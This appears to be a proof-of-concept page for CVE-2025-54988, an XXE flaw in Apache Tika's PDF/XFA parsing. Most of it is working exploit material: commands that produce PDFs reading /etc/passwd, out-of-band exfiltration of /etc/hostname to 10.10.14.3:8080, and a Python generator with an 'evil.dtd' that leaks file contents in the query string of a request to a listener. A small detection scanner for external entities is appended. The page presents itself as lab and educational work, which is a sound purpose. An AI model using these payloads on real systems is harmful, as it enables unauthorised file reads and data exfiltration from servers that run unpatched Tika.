
CVE-2025-54988 PoC — Apache Tika PDF parser module: XXE vulnerability in PDFParser's handling of XFA

Source
Associated Vulnerability
Title: Apache Tika PDF parser module: XXE vulnerability in PDFParser's handling of XFA (CVE-2025-54988)
Description: Critical XXE in Apache Tika (tika-parser-pdf-module) in Apache Tika 1.13 through and including 3.2.1 on all platforms allows an attacker to carry out XML External Entity injection via a crafted XFA file inside of a PDF. An attacker may be able to read sensitive data or trigger malicious requests to internal resources or third-party servers. Note that the tika-parser-pdf-module is used as a dependency in several Tika packages including at least: tika-parsers-standard-modules, tika-parsers-standard-package, tika-app, tika-grpc and tika-server-standard. Users are recommended to upgrade to version 3.2.2, which fixes this issue.
Description
A PDF generator for CVE-2025-54988
Readme
# CVE-2025-54988 - POC
Disclaimer: I am not the original discoverer of this vulnerability. This post documents my process of reproducing the issue in a controlled environment for educational purposes and to help others validate their own systems.
The tests were conducted in an isolated lab with no impact to production systems.

Usage:

```bash
# In-band read: the XFA entity expands to the contents of /etc/passwd inside xfa_passwd.pdf
python3 xfa_xxe_poc_gen.py --mode file --file /etc/passwd -o xfa_passwd.pdf
# Out-of-band: the PDF's parameter entity fetches a DTD from a listener at 127.0.0.1:8888;
# per the flag name, --write-dtd also emits the DTD that listener should serve
python3 xfa_xxe_poc_gen.py --mode oob --ip 127.0.0.1 --port 8888 --write-dtd -o xfa_oob.pdf
# Out-of-band exfiltration of /etc/hostname to 10.10.14.3:8080, naming the parameter entity "d"
python3 xfa_xxe_poc_gen.py --mode oob --ip 10.10.14.3 --port 8080 --oob-file /etc/hostname --param d
```
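Both modes above come down to one thing: an XDP/XFA XML document with a DOCTYPE that declares an external entity, stored as the AcroForm `/XFA` stream of a PDF, which the vulnerable Tika versions hand to an XML parser with external entities enabled. The block below is an added example, not the page's `xfa_xxe_poc_gen.py` and not code from the Apache Tika project: it builds such a PDF for the in-band and out-of-band modes, writes the DTD an OOB listener would serve, and adds the check a defender wants, a scan of a PDF's XFA stream for `SYSTEM`/`PUBLIC` entity declarations. The file paths, listener URL, entity names and form field names are illustrative assumptions, and it has not been run against Tika here.

```python
"""Build a PDF whose AcroForm /XFA stream carries an XXE payload, and scan a
PDF for such a payload.  Added example; NOT the page's xfa_xxe_poc_gen.py and
not Tika code.  Paths, listener URL and entity names are assumptions."""
import re

XDP_NS = "http://ns.adobe.com/xdp/"
XFA_DATA_NS = "http://www.xfa.org/schema/xfa-data/1.0/"


def xfa_payload(mode, target="/etc/passwd", listener="http://127.0.0.1:8888/", param="d"):
    """XFA (XDP) XML as the PDF parser would pass it to an XML parser.

    mode="file": in-band XXE; the entity expands inside the form data, so the
                 file contents end up in whatever the parser emits.
    mode="oob":  blind XXE; parameter entity `param` pulls <listener>evil.dtd
                 (see oob_dtd()), which in turn leaks a file to the listener.
    """
    if mode == "file":
        dtd = f'<!DOCTYPE xdp:xdp [<!ENTITY xxe SYSTEM "file://{target}">]>'
        value = "&xxe;"
    elif mode == "oob":
        dtd = (f'<!DOCTYPE xdp:xdp [<!ENTITY % {param} SYSTEM "{listener}evil.dtd">'
               f"%{param};]>")
        value = "oob"
    else:
        raise ValueError("mode must be 'file' or 'oob'")
    lines = [
        '<?xml version="1.0" encoding="UTF-8"?>',
        dtd,
        f'<xdp:xdp xmlns:xdp="{XDP_NS}">',
        f'<xfa:datasets xmlns:xfa="{XFA_DATA_NS}">',
        f"<xfa:data><form1><field1>{value}</field1></form1></xfa:data>",  # field names assumed
        "</xfa:datasets>",
        "</xdp:xdp>",
    ]
    return ("\n".join(lines) + "\n").encode("utf-8")


def oob_dtd(listener="http://127.0.0.1:8888/", oob_file="/etc/hostname"):
    """DTD served at <listener>evil.dtd: reads oob_file into a parameter entity
    and leaks it in the query string of a second request to the listener."""
    return (
        f'<!ENTITY % file SYSTEM "file://{oob_file}">\n'
        '<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM '
        f"'{listener}?x=%file;'\">\n"
        "%eval;\n"
        "%exfil;\n"
    )


def build_pdf(xfa):
    """Minimal PDF: catalog -> AcroForm -> uncompressed /XFA stream, with a
    correct xref table so strict parsers do not reject it before reaching XFA."""
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /AcroForm 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        b"<< /Fields [] /XFA 5 0 R >>",
        b"<< /Length %d >>\nstream\n" % len(xfa) + xfa + b"\nendstream",
    ]
    out = bytearray(b"%PDF-1.7\n")
    offsets = []
    for num, body in enumerate(objs, start=1):
        offsets.append(len(out))
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref_pos = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += (b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n"
            % (len(objs) + 1, xref_pos))
    return bytes(out)


STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
EXT_ENTITY_RE = re.compile(rb"<!ENTITY\s+(?:%\s*)?\w+\s+(?:SYSTEM|PUBLIC)\b", re.I)


def xfa_streams(pdf):
    """Raw bodies of streams that look like XDP/XFA XML.  Assumes they are
    stored uncompressed (build_pdf writes no /Filter); a FlateDecode stream
    would have to be inflated first, which this check does not do."""
    return [s for s in STREAM_RE.findall(pdf) if b"xdp" in s.lower()]


def has_external_entity(pdf):
    """True if any XFA stream declares an external (SYSTEM/PUBLIC) entity,
    general or parameter.  Legitimate XFA carries no DTD, so any hit is worth
    quarantining before an unpatched Tika parses the file."""
    return any(EXT_ENTITY_RE.search(s) for s in xfa_streams(pdf))


def startxref_offset(pdf):
    """Offset recorded after 'startxref'; used to verify the xref table."""
    return int(pdf.rsplit(b"startxref\n", 1)[1].split(b"\n", 1)[0])


if __name__ == "__main__":
    with open("xfa_passwd.pdf", "wb") as fh:
        fh.write(build_pdf(xfa_payload("file", target="/etc/passwd")))
    with open("xfa_oob.pdf", "wb") as fh:
        fh.write(build_pdf(xfa_payload("oob", listener="http://127.0.0.1:8888/")))
    with open("evil.dtd", "w") as fh:
        fh.write(oob_dtd("http://127.0.0.1:8888/", "/etc/hostname"))
    with open("xfa_passwd.pdf", "rb") as fh:
        print("external entity in XFA:", has_external_entity(fh.read()))
```

The scanner is deliberately dumb: it does not inflate FlateDecode streams or follow `/XFA` arrays, so treat a hit as conclusive and a miss as inconclusive, and pair it with the real fix, upgrading to Tika 3.2.2.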
